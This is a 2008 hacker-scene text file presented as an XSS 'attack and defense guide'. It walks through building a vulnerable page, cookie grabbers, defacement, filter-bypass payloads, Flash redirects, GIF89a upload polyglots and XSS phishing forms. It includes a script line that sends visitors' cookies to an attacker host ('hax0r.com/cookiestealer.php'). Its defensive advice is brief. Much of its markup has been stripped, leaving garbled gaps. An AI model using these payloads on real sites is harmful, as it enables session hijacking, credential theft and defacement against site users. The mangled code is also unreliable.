____ / / ________________________________________________________________________/ / | / / | Cross Site Scripting - Attack and Defense guide / / |_____________________________________________________________________/ / / / By Xylitol 10-02-08 /___/ Author: Xylitol Description: a simple guide on XSS methods. Homepage: http://xylitol.free.fr Contact: Xylitol[at]fbi[dot]gov Date: 10/02/08 Summary: 1> What is XSS ? 2> Code a XSS vulnerability 3> Make a cookie grabber 4> Securing XSS 5> Deface Methods 6> Filteration Bypassing 7> Flash attak 8> XSS upload 9> phishing XSS ____ ____ / / \ \ ______/ /_____________________________________\ \______ | / / \ \ | | / /.: Chapter 1 - What is XSS ? :.\ \ | |___/ /___________________________________________\ \___| / / (From Wikipedia, the free encyclopedia) \ \ /___/ \___\ Cross-zone scripting is a browser exploit taking advantage of a vulnerability within a zone-based security solution. The attack allows content (scripts) in unprivileged zones to be executed with the permissions of a privileged zone - i.e. a privilege escalation within the client (web browser) executing the script. The vulnerability could be: * a web browser bug which under some conditions allows content (scripts) in one zone to be executed with the permissions of a higher privileged zone. * a web browser configuration error; unsafe sites listed in privileged zones. * a cross-site scripting vulnerability within a privileged zone A common attack scenario involves two steps. The first step is to use a Cross Zone Scripting vulnerability to get scripts executed within a privileged zone. To complete the attack, then perform malicious actions on the computer using insecure ActiveX components. This type of vulnerability has been exploited to silently install various malware (such as spyware, remote control software, worms and such) onto computers browsing a malicious web page. ____ ____ / / \ \ ______/ /_____________________________________\ \______ | / / \ \ | | / /.:Chapter 2 - Code a XSS vulnerability :.\ \ | |___/ /___________________________________________\ \___| / / \ \ /___/ \___\ Open notepad and copy/past this script: Simple XSS vulnerability by Xylitol

Simple XSS vulnerability by Xylitol

Search:
after, save this page: index.html open a new notpad and Copy/past that: Search result: Search result :   save this page in: XSS.php close notepad open index.html in firefox enter a value and search return on the page of research and enter send the form bingo a dialogue box ! _______________________________________ / http://127.0.0.1 dit: X \ |________________________________________| | | | | | ^ | | / \ | | / | \ XSS | | / . \ | | ------- | | ______ | | | OK | | | ------ | |________________________________________| XSS Vulnerability is here... ____ ____ / / \ \ ______/ /____________________________________\ \______ | / / \ \ | | / /.: Chapter 3 - Make a cookie grabbers :.\ \ | |___/ /__________________________________________\ \___| / / \ \ /___/ \___\ insert this script in a vulnerable page (for exemple a guestbook) (www.Hax0r.com = your site) Open notepad and make a page: cookie.php copy/past this code: Error

Error - Access denied for

It is not enough any more but for the pirate, than to await the reception of the email and to read the cookie there. ____ ____ / / \ \ ______/ /___________________________________\ \______ | / / \ \ | | / /.: Chapter 4 - Securing XSS :.\ \ | |___/ /_________________________________________\ \___| / / \ \ /___/ \___\ FIX it: for fix XSS Vulnerability use htmlentities: in line 16 Remplace: Search result :   By: Search result :   use htmlspecialchars() function in PHP ;) other function: htmlentities() quotes strip_tags() ... ____ ____ / / \ \ ______/ /___________________________________\ \______ | / / \ \ | | / /.: Chapter 5 -deface Methods :.\ \ | |___/ /_________________________________________\ \___| / / \ \ /___/ \___\ defacer with a XSS and a rather simple thing here are the principal ones… defacement by an image: or a video flash: window.open( "http://www.hax0r.com/Haxored.html" ) also see: ____ ____ / / \ \ ______/ /___________________________________\ \______ | / / \ \ | | / /.: Chapter 6 - Filteration Bypassing :.\ \ | |___/ /_________________________________________\ \___| / / \ \ /___/ \___\ actually it's not that easy to bypass htmlspecialchars() here some other example of xss Bypass: '">>

XSS

'">> '>>

XSS

"> '); alert('XSS "> alert(\"XSS\")'); ?> ipt>alert('XSS');ipt> Here and there is of it full with others google is your friends ____ ____ / / \ \ ______/ /___________________________________\ \______ | / / \ \ | | / /.: Chapter 7 - Flash attack :.\ \ | |___/ /_________________________________________\ \___| / / \ \ /___/ \___\ Flash is used for complex animations, simulations, *creation of games etc.. What’s interesting for us is the getURL() action. This function allows us to redirect the end user to another page. its syntax is built as follows: getURL(url:String, [window: String,[method:String]]) exemple: getURL("http://victime.com/login.php?logout=true","_self"); url: indicate the URL of the site window: specify within which framework the request must take place (_self, _blank…) method: method of request GET or POST (by defect GET) here the handling of the actionscript and the Javascript to post a alert: getURL("javascript:alert('XSS'"); in 2002 one will show the danger of this facility, one could for example post the cookie of visitors in this manner: getURL("javascript:alert(document.cookie)") in December 2005, a new alternative and appeared consisting has to benefit from a nonpermanent fault XSS and possibility of putting a file flash in its signature to give a permanent XSS, moreover the author of this alternative used this technique in order to infect MySpace with a deviated worms xss of Samy: Samy Reloaded cookie stealer in flash ? not but there is technique to do it exemple in a flash file: GetURL("http://www.victime.com/page.php?var=","_self"); and in Haxored.js: document.location="http://hax0r.com/cookiestealer.php?cookie="+document.cookie; For secure it simple solution: do not allow flash files in your web app ____ ____ / / \ \ ______/ /______________________________________\ \______ | / / \ \ | | / /.: Chapter 8 - XSS upload :.\ \ | |___/ /____________________________________________\ \___| / / \ \ /___/ \___\ Make Haxored.gif in paint for exemple after open Haxored.GIF in notepad delete all line and insert this: GIF89a save and close it upload Haxored.gif in a free image hoster look your image and XSS is here... dont take Mozillia Firefox for look your image but Mozillia dont run your alert use Internet explorer Why add GIF89a ? well some upload like this one, check that the 'GIF89a' code is contained in the image as in any .GIF respective. the vulnerability of this upload results from the checking 'GIF89a' code for confirmation but of nothing the possible malicious codes contained in this image. GIF89a to know the code for another image format, it is just enough to open an image jpg or other with a text editor, for example a png file: ‰PNG PNG = ‰PNG GIF = GIF89a JPG = ÿØÿà JFIF BMP = BMFÖ For secure it dont check getimagesize() only ____ ____ / / \ \ ______/ /______________________________________\ \______ | / / \ \ | | / /.: Chapter 9 - Phishing XSS :.\ \ | |___/ /____________________________________________\ \___| / / \ \ /___/ \___\ you understood the goal of the phishing ? and XSS ? in our example it will be necessary to find a Vulnerable site to the XSS and to inject there oneself in a form to oneself directly in the URL the following code:

Enter your login and password, thank:

Login:
Password:
you will have it to guess script will simulate a form of connextion and send the value to you example of file php for sending this email (mail.php): Error

Error - Server too much busy

the user will believe that the waiter and overloads some and will not suspect nothing I think that you understood this principle ? ____ ____ / / \ \ ______/ /______________________________________\ \______ | / / \ \ | | / /.: Xylitol respects and hello's fly out :.\ \ | |___/ /____________________________________________\ \___| / / \ \ /___/ \___\ nexus, Langy, Uber0n, FullFreeez, RePliKaN!, bl00d, c0de91, Xonzai Agent-D, Agent-Z, Vamp, Xspider, Mitnick, Honnox, Blwood, str0ke and all hardworking sceners in the scene ! _________________________________ | | | .: Xylitol thanks this sites :. | |_________________________________| http://www.googlebig.com/ http://xssed.com/ http://www.xssing.com/ http://www.milw0rm.com/ http://H4cky0u.org/ If you want to contact me for any stupid reason, drop me an MSN or WLM only: Xylitol[at]fbi[dot]gov ____ \ \ \ \_____________________________________________________________________________ \ \ | \ \ Cross Site Scripting - Attack and Defense guide | \ \__________________________________________________________________________| \ \ \___\ By Xylitol 10-02-08